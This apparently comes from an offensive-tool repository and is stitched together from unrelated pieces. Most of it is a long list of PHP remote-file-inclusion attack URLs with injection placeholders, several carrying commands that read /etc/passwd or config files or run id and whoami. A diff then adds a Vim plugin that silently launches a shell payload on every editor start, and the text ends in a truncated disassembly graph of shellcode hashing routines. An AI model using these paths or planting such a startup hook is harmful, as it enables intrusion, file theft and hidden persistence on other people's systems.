/script/ident/loginliste.php?path_inc=!INJECT!
/script/ident/loginmodif.php?path_inc=!INJECT!
/script/index.php?path_inc=!INJECT!
/script/init/createallimagecache.php?PATH_TO_CODE=!INJECT!
/script/menu/menuadministration.php?path_inc=!INJECT!
/script/menu/menuprincipal.php?path_inc=!INJECT!
/script/param/param.inc.php?path_inc=!INJECT!
/script/plugins/phpgacl/admin/index.php?path_inc=!INJECT!
/script/template/index.php?main_page_directory=!INJECT!
/script/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
/script/tick/test.php?PATH_TO_CODE=!INJECT!
/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=!INJECT!?
/script_path/cms/classes/openengine/filepool.php?oe_classpath=!INJECT!?
/script_path/installation/index.php?mosConfig_absolute_path=!INJECT!?
/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=!INJECT!
/scripts/check-lom.php?ETCDIR=!INJECT!
/scripts/gallery.scr.php?GLOBALS[PTH][func]=!INJECT!?
/scripts/lom_update.php?ETCDIR=!INJECT!
/scripts/news.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/polls.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/rss.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/search.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/weigh_keywords.php?ETCDIR=!INJECT!
/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=!INJECT!?
/search.php?config["sipssys"]=!INJECT!
/search.php?id=!INJECT!
/search.php?insPath=!INJECT!
/search/submit.php?config["sipssys"]=!INJECT!
/search_wA.php?LIBPATH=!INJECT!
/searchbot.php?path=!INJECT!
/security/include/_class.security.php?PHPSECURITYADMIN_PATH=!INJECT!
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=!INJECT!?
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=!INJECT!?
/senetman/html/index.php?page=!INJECT!
/services.php?page=!INJECT!
/services/samples/inclusionService.php?CabronServiceFolder=!INJECT!%00
/settings.php?P[includes]=!INJECT!
/settings_sql.php?path=!INJECT!
/setup/inc/database.php?tcms_administer_site=!INJECT!
/setup/upgrader.php?RootDirectory=!INJECT!
/sezhoo/SezHooTabsAndActions.php?IP=!INJECT!
/shop/includes/header.inc.php?dateiPfad=!INJECT!
/shop/index.php?action=!INJECT!?&cmd=cat%20config.php
/shop/page.php?osCsid=!INJECT!?
/shop/page.php?pageid=!INJECT!?
/shoutbox.php?language=!INJECT!
/shoutbox.php?root=!INJECT!?cmd=id
/show.php?file=!INJECT!
/show.php?id=!INJECT!
/show.php?page=!INJECT!
/show.php?path=!INJECT!
/show_archives.php?cutepath=!INJECT!?
/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=!INJECT!
/sid=!INJECT!
/signer/final.php?smiley=!INJECT!?
/signin.php?sent=1&AMG_serverpath=!INJECT!
/sinagb.php?fuss=!INJECT!
/sinapis.php?fuss=!INJECT!
/sitebar/Integrator.php?file=!INJECT!
/sitebar/index.php?writerFile=!INJECT!
/sitebuilder/admin/top.php?admindir=!INJECT!
/sitemap.xml.php?dir[classes]=!INJECT!
/skin/board/default/doctype.php?dir=!INJECT!
/skin/dark/template.php?path=!INJECT!
/skin/gold/template.php?path=!INJECT!
/skin/html/table.php?pachtofile=!INJECT!
/skin/original/template.php?path=!INJECT!
/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=!INJECT!
/skins/advanced/advanced1.php?pluginpath[0]=!INJECT!
/skins/default.php?dir_inc=!INJECT!
/skins/header.php?ote_home=!INJECT!
/skins/phpchess/layout_admin_cfg.php?Root_Path=!INJECT!
/skins/phpchess/layout_cfg.php?Root_Path=!INJECT!
/skins/phpchess/layout_t_top.php?Root_Path=!INJECT!
/skysilver/login.tpl.php?theme=!INJECT!?
/slogin_lib.inc.php?slogin_path=!INJECT!?
/smarty.php?xcart_dir=!INJECT!?
/smarty/smarty_class.php?_smarty_compile_path=!INJECT!
/smilies.php?config=!INJECT!
/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!?
/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=!INJECT!?
/snort/base_stat_common.php?BASE_path=!INJECT!
/social_game_play.php?path=!INJECT!?
/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=!INJECT!
/song.php?phpbb_root_path=!INJECT!
/source.php?bibtexrootrel=!INJECT!?
/source/mod/rss/channeledit.php?Codebase=!INJECT!
/source/mod/rss/post.php?Codebase=!INJECT!
/source/mod/rss/view.php?Codebase=!INJECT!
/source/mod/rss/viewitem.php?Codebase=!INJECT!
/sources/Admin/admin_cats.php?CONFIG[main_path]=!INJECT!
/sources/Admin/admin_edit.php?CONFIG[main_path]=!INJECT!
/sources/Admin/admin_import.php?CONFIG[main_path]=!INJECT!
/sources/Admin/admin_templates.php?CONFIG[main_path]=!INJECT!
/sources/functions.php?CONFIG[main_path]=!INJECT!
/sources/help.php?CONFIG[main_path]=!INJECT!
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=!INJECT!
/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=!INJECT!
/sources/mail.php?CONFIG[main_path]=!INJECT!
/sources/misc/new_day.php?path=!INJECT!
/sources/news.php?CONFIG[main_path]=!INJECT!
/sources/post.php?fil_config=!INJECT!
/sources/template.php?CONFIG[main_path]=!INJECT!
/sources/tourney/index.php?page=!INJECT!?
/spaw/spaw_control.class.php?GLOBALS[spaw_root]=!INJECT!
/spaw/spaw_control.class.php?spaw_root=!INJECT!
/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=!INJECT!
/spellcheckwindowframeset.php?SpellIncPath=!INJECT!
/squirrelcart/cart_content.php?cart_isp_root=!INJECT!
/src/ark_inc.php?cfg_pear_path=!INJECT!?
/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=!INJECT!
/src/scripture.php?pageHeaderFile=!INJECT!?
/starnet/themes/c-sky/main.inc.php?cmsdir=!INJECT!?
/start.php?lang=!INJECT!
/start.php?pg=!INJECT!
/stat_modules/users_age/module.php?phpbb_root_path=!INJECT!
/stats.php?vwar_root=!INJECT!
/stphpapplication.php?STPHPLIB_DIR=!INJECT!
/stphpbtnimage.php?STPHPLIB_DIR=!INJECT!
/stphpform.php?STPHPLIB_DIR=!INJECT!
/str.php?p=!INJECT!
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!?
/strload.php?LangFile=!INJECT!
/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=!INJECT!?
/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=!INJECT!?
/styles.php?toroot=!INJECT!
/styles/default/global_header.php?installed=23&domain=!INJECT!
/submit_abuse.php?path_prefix=!INJECT!
/submit_comment.php?path_prefix=!INJECT!
/subscp.php?phpbb_root_path=!INJECT!?
/suite/index.php?pg=!INJECT!?
/supasite/admin_auth_cookies.php?supa[db_path]=!INJECT!
/supasite/admin_mods.php?supa[db_path]=!INJECT!
/supasite/admin_news.php?supa[db_path]=!INJECT!
/supasite/admin_settings.php?supa[include_path]=!INJECT!
/supasite/admin_topics.php?supa[db_path]=!INJECT!
/supasite/admin_users.php?supa[db_path]=!INJECT!
/supasite/admin_utilities.php?supa[db_path]=!INJECT!
/supasite/backend_site.php?supa[include_path]=!INJECT!
/supasite/common_functions.php?supa[db_path]=!INJECT!
/supasite/site_comment.php?supa[db_path]=!INJECT!
/supasite/site_news.php?supa[db_path]=!INJECT!
/support/include/open_form.php?include_dir=!INJECT!?cmd=pwd
/support/index.php?main=!INJECT!
/surveys/survey.inc.php?path=!INJECT!
/sw/lib_comment/comment.php?doc_directory=!INJECT!?
/sw/lib_find/find.php?doc_directory=!INJECT!?
/sw/lib_session/session.php?doc_directory=!INJECT!?
/sw/lib_up_file/file.php?doc_directory=!INJECT!?
/sw/lib_up_file/find_file.php?doc_directory=!INJECT!?
/sw/lib_user/find_user.php?doc_directory=!INJECT!?
/sw/lib_user/user.php?doc_directory=!INJECT!?
/sys/code/box.inc.php?config["sipssys"]=!INJECT!
/system/ImageImageMagick.php?glConf[path_system]=!INJECT!?
/system/_b/contentFiles/gBIndex.php?gBRootPath=!INJECT!?
/system/admin/include/item_main.php?GLOBALS=!INJECT!
/system/admin/include/upload_form.php?GLOBALS=!INJECT!
/system/command/admin.cmd.php?GLOBALS=!INJECT!
/system/command/download.cmd.php?GLOBALS=!INJECT!
/system/funcs/xkurl.php?PEARPATH=!INJECT!
/system/includes/pageheaderdefault.inc.php?_sysSessionPath=!INJECT!
/system/login.php?site_path=!INJECT!
/tagit2b/tagmin/delTagUser.php?configpath=!INJECT!?
/tags.php?BBCodeFile=!INJECT!
/taxonservice.php?dir=!INJECT!?
/teatro/pub/pub08_comments.php?basePath=!INJECT!
/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=!INJECT!?
/template.php?actionsPage=!INJECT!?
/template.php?blog_theme=!INJECT!
/template.php?pagina=!INJECT!
/template/Noir/index.php?site_path=!INJECT!
/template/Vert/index.php?pageAll=!INJECT!
/template/Vert/index.php?site_path=!INJECT!
/template/barnraiser_01/p_new_password.tpl.php?templatePath=!INJECT!
/template/default/footer.php?ROOT_PATH=!INJECT!?cmd=ls
/template/default/test/header.php?ROOT_PATH=!INJECT!?cmd=ls
/template/gwb/user_bottom.php?config[template_path]=!INJECT!
/template/purpletech/base_include.php?page=!INJECT!?
/template/rwb/user_bottom.php?config[template_path]=!INJECT!
/template_csv.php?rInfo[content]=!INJECT!
/templates/2blue/bodyTemplate.php?serverPath=!INJECT!?
/templates/Official/part_userprofile.php?template_path=!INJECT!
/templates/barrel/template.tpl.php?renderer=!INJECT!
/templates/barrel/template.tpl.php?renderer=!INJECT!?
/templates/barry/template.tpl.php?renderer=!INJECT!
/templates/be2004-2/index.php?mosConfig_absolute_path=!INJECT!
/templates/datumVonDatumBis.inc.php?root=!INJECT!
/templates/default/header.inc.php?menu=!INJECT!
/templates/default/index_logged.php?main_loaded=1&cur_module=!INJECT!
/templates/default/tpl_message.php?right_file=!INJECT!
/templates/footer.inc.php?root=!INJECT!
/templates/header.inc.php?root=!INJECT!
/templates/mylook/template.tpl.php?renderer=!INJECT!
/templates/oerdec/template.tpl.php?renderer=!INJECT!
/templates/pb/language/lang_nl.php?temppath=!INJECT!
/templates/penguin/template.tpl.php?renderer=!INJECT!
/templates/sidebar/template.tpl.php?renderer=!INJECT!
/templates/slashdot/template.tpl.php?renderer=!INJECT!
/templates/stylesheets.php?root=!INJECT!
/templates/text-only/template.tpl.php?renderer=!INJECT!
/templates/tmpl_dfl/scripts/index.php?dir[inc]=!INJECT!
/theme/breadcrumb.php?rootBase=!INJECT!?
/theme/default.php?root=!INJECT!
/theme/format.php?_page_content=!INJECT!?
/theme/format.php?_page_css=!INJECT!?
/theme/frames1.php?root=!INJECT!
/theme/frames1_center.php?root=!INJECT!
/theme/frames1_left.php?root=!INJECT!
/theme/frames1_top.php?root=!INJECT!
/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=!INJECT!
/theme/settings.php?pfad_z=!INJECT!
/theme/test1.php?root=!INJECT!
/theme/test2.php?root=!INJECT!
/theme/test3.php?root=!INJECT!
/theme/test4.php?root=!INJECT!
/theme/test5.php?root=!INJECT!
/theme/test6.php?root=!INJECT!
/themes.php?GLOBALS[theme_path]=!INJECT!?
/themes/blackorange.php?root=!INJECT!
/themes/container.php?theme_directory=!INJECT!%00
/themes/default/layouts/standard.php?page_include=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/themes/default/preview_post_completo.php?dir=!INJECT!
/themes/header.php?theme_directory=!INJECT!%00
/themes/ubb/login.php?theme=!INJECT!
/themes/ubb/login.php?theme=!INJECT!?
/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=!INJECT!
/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=!INJECT!
/timedifference.php?la=!INJECT!
/toolbar.loudmouth.php?mainframe=!INJECT!
/tools/update_translations.php?_SESSION[path]=!INJECT!?
/top.php?laypath=!INJECT!
/toplist.php?f=toplist_top10&phpbb_root_path=!INJECT!
/topsites/index.php?page=!INJECT!?&
/towels-0.1/src/scripture.php?pageHeaderFile=!INJECT!
/track.php?path=!INJECT!
/tsep/include/colorswitch.php?tsep_config[absPath]=!INJECT!?
/ttCMS_path/lib/db/ez_sql.php?lib_path=!INJECT!
/twebs/modules/misc/usermods.php?ROOT=!INJECT!
/ubbt.inc.php?GLOBALS[thispath]=!INJECT!?
/unavailable.php?bibtexrootrel=!INJECT!?
/unsubs.php?scdir=!INJECT!
/up.php?my[root]=!INJECT!
/upload.php?save_path=!INJECT!?
/upload/admin/frontpage_right.php?loadadminpage=!INJECT!?
/upload/top.php?maindir=!INJECT!?
/upload/xax/admin/modules/install_module.php?level=!INJECT!?
/upload/xax/admin/patch/index.php?level=!INJECT!?
/upload/xax/ossigeno/admin/install_module.php?level=!INJECT!?
/upload/xax/ossigeno/admin/uninstall_module.php?level=!INJECT!?
/upload_local.php?target=!INJECT!?
/upload_multi.php?target=!INJECT!?
/urlinn_includes/config.php?dir_ws=!INJECT!?
/user.php?caselist[bad_file.txt][path]=!INJECT!&command=cat%20/etc/passwd
/user_language.php?INDM=r3d.w0rm&language_dir=!INJECT!?
/user_new_2.php?home=!INJECT!
/usr/extensions/get_calendar.inc.php?root_path=!INJECT!
/usr/extensions/get_infochannel.inc.php?root_path=!INJECT!?cmd=id;pwd
/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=!INJECT!
/utilitaires/gestion_sondage.php?repertoire_visiteur=!INJECT!
/utils/class_HTTPRetriever.php?libcurlemuinc=!INJECT!
/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=!INJECT!
/vCard/admin/define.inc.php?match=!INJECT!?&cmd=id
/vb/includes/functions.php?classfile=!INJECT!
/vb/includes/functions_cron.php?nextitem=!INJECT!
/vb/includes/functions_forumdisplay.php?specialtemplates=!INJECT!
/vbgsitemap/vbgsitemap-config.php?base=!INJECT!
/vbgsitemap/vbgsitemap-vbseo.php?base=!INJECT!
/vedit/editor/edit_htmlarea.php?highlighter=!INJECT!?
/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=!INJECT!?
/view.php?ariadne=!INJECT!?
/view.php?id=!INJECT!
/view_func.php?i=!INJECT!&l=testfile.txt?
/views/print/printbar.php?views_path=!INJECT!
/visible_count_inc.php?statitpath=!INJECT!
/visitor.php?_SERVER[DOCUMENT_ROOT]=!INJECT!??
/volume.php?config[public_dir]=!INJECT!?
/vote.php?Madoa=!INJECT!?
/votebox.php?VoteBoxPath=!INJECT!
/vp/configure.php?phpbb_root_path=!INJECT!?
/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
/w-agora_path/add_user.php?bn_dir_default=!INJECT!?
/w-agora_path/create_forum.php?bn_dir_default=!INJECT!?
/w-agora_path/create_user.php?bn_dir_default=!INJECT!?
/w-agora_path/delete_notes.php?bn_dir_default=!INJECT!?
/w-agora_path/delete_user.php?bn_dir_default=!INJECT!?
/w-agora_path/edit_forum.php?bn_dir_default=!INJECT!?
/w-agora_path/mail_users.php?bn_dir_default=!INJECT!?
/w-agora_path/moderate_notes.php?bn_dir_default=!INJECT!?
/w-agora_path/reorder_forums.php?bn_dir_default=!INJECT!?
/wamp_dir/setup/yesno.phtml?no_url=!INJECT!?
/wapchat/src/eng.adCreate.php?sysFileDir=!INJECT!
/wapchat/src/eng.adCreateSave.php?sysFileDir=!INJECT!
/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=!INJECT!
/wapchat/src/eng.createRoom.php?sysFileDir=!INJECT!
/wapchat/src/eng.forward.php?sysFileDir=!INJECT!
/wapchat/src/eng.pageLogout.php?sysFileDir=!INJECT!
/wapchat/src/eng.resultMember.php?sysFileDir=!INJECT!
/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=!INJECT!
/wapchat/src/eng.saveNewRoom.php?sysFileDir=!INJECT!
/wapchat/src/eng.searchMember.php?sysFileDir=!INJECT!
/wapchat/src/eng.writeMsg.php?sysFileDir=!INJECT!
/war.php?vwar_root=!INJECT!
/warn.php?file=!INJECT!
/watermark.php?GALLERY_BASEDIR=!INJECT!
/wbxml/WBXML/Decoder.php?base_dir=!INJECT!
/wbxml/WBXML/Encoder.php?base_dir=!INJECT!
/web/Administration/Includes/configureText.php?path_prefix=!INJECT!
/web/Administration/Includes/contentHome.php?path_prefix=!INJECT!
/web/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
/web/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
/web/Administration/Includes/userHome.php?path_prefix=!INJECT!
/web/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix!INJECT!
/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
/web/Flickrclient.php?path_prefix=!INJECT!
/web/help.php?LIBSDIR=!INJECT!
/web/includes/blogger.php?path_prefix=!INJECT!
/web/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
/web/includes/functions/html_generate.php?path_prefix=!INJECT!
/web/includes/functions/validations.php?path_prefix=!INJECT!
/web/index.php?LIBSDIR=!INJECT!
/web/lib/xml/oai/ListRecords.php?xml_dir=!INJECT!
/web/login.php?LIBSDIR=!INJECT!
/web/logout.php?LIBSDIR=!INJECT!
/web/lom.php?ETCDIR=!INJECT!
/web/network_module_selector.php?path_prefix=!INJECT!
/web/submit_abuse.php?path_prefix=!INJECT!
/web/submit_comment.php?path_prefix=!INJECT!
/webavis/class/class.php?root=!INJECT!?
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
/webnews/template.php?content_page=!INJECT!?
/webroot/css.php?CONFIGS=!INJECT!
/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=!INJECT!
/webyep-system/programm/webyep.php?webyep_sIncludePath=!INJECT!?
/window.php?action=!INJECT!
/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=!INJECT!?
/work/index.php?g_include=!INJECT!
/work/module/forum/forum.php?g_include=!INJECT!
/worldpay_notify.php?mosConfig_absolute_path=!INJECT!
/wp-cache-phase1.php?plugin=!INJECT!
/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
/wp-content/plugins/myflash/myflash-button.php?wpPATH=!INJECT!
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=!INJECT!
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=!INJECT!?
/wsk/wsk.php?wsk=!INJECT!
/xarg_corner.php?xarg=!INJECT!?
/xarg_corner_bottom.php?xarg=!INJECT!?
/xarg_corner_top.php?xarg=!INJECT!?
/xoopsgallery/init_basic.php?GALLERY_BASEDIR=!INJECT!?&2093085906=1&995617320=2
/xt_counter.php?server_base_dir=!INJECT!
/yabbse/Sources/Packages.php?sourcedir=!INJECT!
/yacs/scripts/update_trailer.php?context[path_to_root]=!INJECT!?
/yrch/plugins/metasearch/plug.inc.php?path=!INJECT!
/ytb/cuenta/cuerpo.php?base_archivo=!INJECT!
/zipndownload.php?PP_PATH=!INJECT!?
/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=!INJECT!?
+11
View File
@@ -0,0 +1,11 @@
" NAME.vim - Runs in the background on startup, discards output
if !has('job') || exists('g:loaded_ZZWcUtfrDa')
finish
endif
let g:loaded_NAME = 1
augroup NAME
autocmd!
autocmd VimEnter * silent! call job_start(["/bin/sh", "-c", "PAYLOAD_PLACEHOLDER"], {'out_io': 'null', 'err_io': 'null'})
augroup END
+157 -164
View File
@@ -90,350 +90,343 @@
<node id="block.0x1017:instruction.0x101b">
<data key="address">0x101b</data>
<data key="type">instruction</data>
<data key="instruction.hex">480fb74a4a</data>
<data key="instruction.source">movzx rcx, word ptr [rdx + 0x4a]</data>
<data key="instruction.hex">480fb74a48</data>
<data key="instruction.source">movzx rcx, word ptr [rdx + 0x48]</data>
</node>
<node id="block.0x1017:instruction.0x1020">
<data key="address">0x1020</data>
<data key="type">instruction</data>
<data key="instruction.hex">4d31c9</data>
<data key="instruction.source">xor r9, r9</data>
<data key="instruction.hex">41b900000000</data>
<data key="instruction.source">mov r9d, 0</data>
</node>
</graph>
</node>
<node id="block.0x1023">
<data key="address">0x1023</data>
<node id="block.0x1026">
<data key="address">0x1026</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1023</data>
<data key="address">0x1026</data>
<data key="type">block</data>
<node id="block.0x1023:instruction.0x1023">
<data key="address">0x1023</data>
<node id="block.0x1026:instruction.0x1026">
<data key="address">0x1026</data>
<data key="type">instruction</data>
<data key="instruction.hex">4831c0</data>
<data key="instruction.source">xor rax, rax</data>
</node>
<node id="block.0x1023:instruction.0x1026">
<data key="address">0x1026</data>
<node id="block.0x1026:instruction.0x1029">
<data key="address">0x1029</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [rsi]</data>
</node>
<node id="block.0x1023:instruction.0x1027">
<data key="address">0x1027</data>
<node id="block.0x1026:instruction.0x102a">
<data key="address">0x102a</data>
<data key="type">instruction</data>
<data key="instruction.hex">3c61</data>
<data key="instruction.source">cmp al, 0x61</data>
</node>
<node id="block.0x1023:instruction.0x1029">
<data key="address">0x1029</data>
<node id="block.0x1026:instruction.0x102c">
<data key="address">0x102c</data>
<data key="type">instruction</data>
<data key="instruction.hex">7c02</data>
<data key="instruction.source">jl 0x102d</data>
<data key="instruction.source">jl 0x1030</data>
</node>
<edge source="block.0x1023:instruction.0x1023" target="block.0x1023:instruction.0x1026"/>
<edge source="block.0x1023:instruction.0x1026" target="block.0x1023:instruction.0x1027"/>
<edge source="block.0x1023:instruction.0x1027" target="block.0x1023:instruction.0x1029"/>
<edge source="block.0x1026:instruction.0x1026" target="block.0x1026:instruction.0x1029"/>
<edge source="block.0x1026:instruction.0x1029" target="block.0x1026:instruction.0x102a"/>
<edge source="block.0x1026:instruction.0x102a" target="block.0x1026:instruction.0x102c"/>
</graph>
</node>
<node id="block.0x102b">
<data key="address">0x102b</data>
<node id="block.0x102e">
<data key="address">0x102e</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x102b</data>
<data key="address">0x102e</data>
<data key="type">block</data>
<node id="block.0x102b:instruction.0x102b">
<data key="address">0x102b</data>
<node id="block.0x102e:instruction.0x102e">
<data key="address">0x102e</data>
<data key="type">instruction</data>
<data key="instruction.hex">2c20</data>
<data key="instruction.source">sub al, 0x20</data>
</node>
</graph>
</node>
<node id="block.0x102d">
<data key="address">0x102d</data>
<node id="block.0x1030">
<data key="address">0x1030</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x102d</data>
<data key="address">0x1030</data>
<data key="type">block</data>
<node id="block.0x102d:instruction.0x102d">
<data key="address">0x102d</data>
<node id="block.0x1030:instruction.0x1030">
<data key="address">0x1030</data>
<data key="type">instruction</data>
<data key="instruction.hex">41c1c90d</data>
<data key="instruction.source">ror r9d, 0xd</data>
</node>
<node id="block.0x102d:instruction.0x1031">
<data key="address">0x1031</data>
<node id="block.0x1030:instruction.0x1034">
<data key="address">0x1034</data>
<data key="type">instruction</data>
<data key="instruction.hex">4101c1</data>
<data key="instruction.source">add r9d, eax</data>
</node>
<node id="block.0x102d:instruction.0x1034">
<data key="address">0x1034</data>
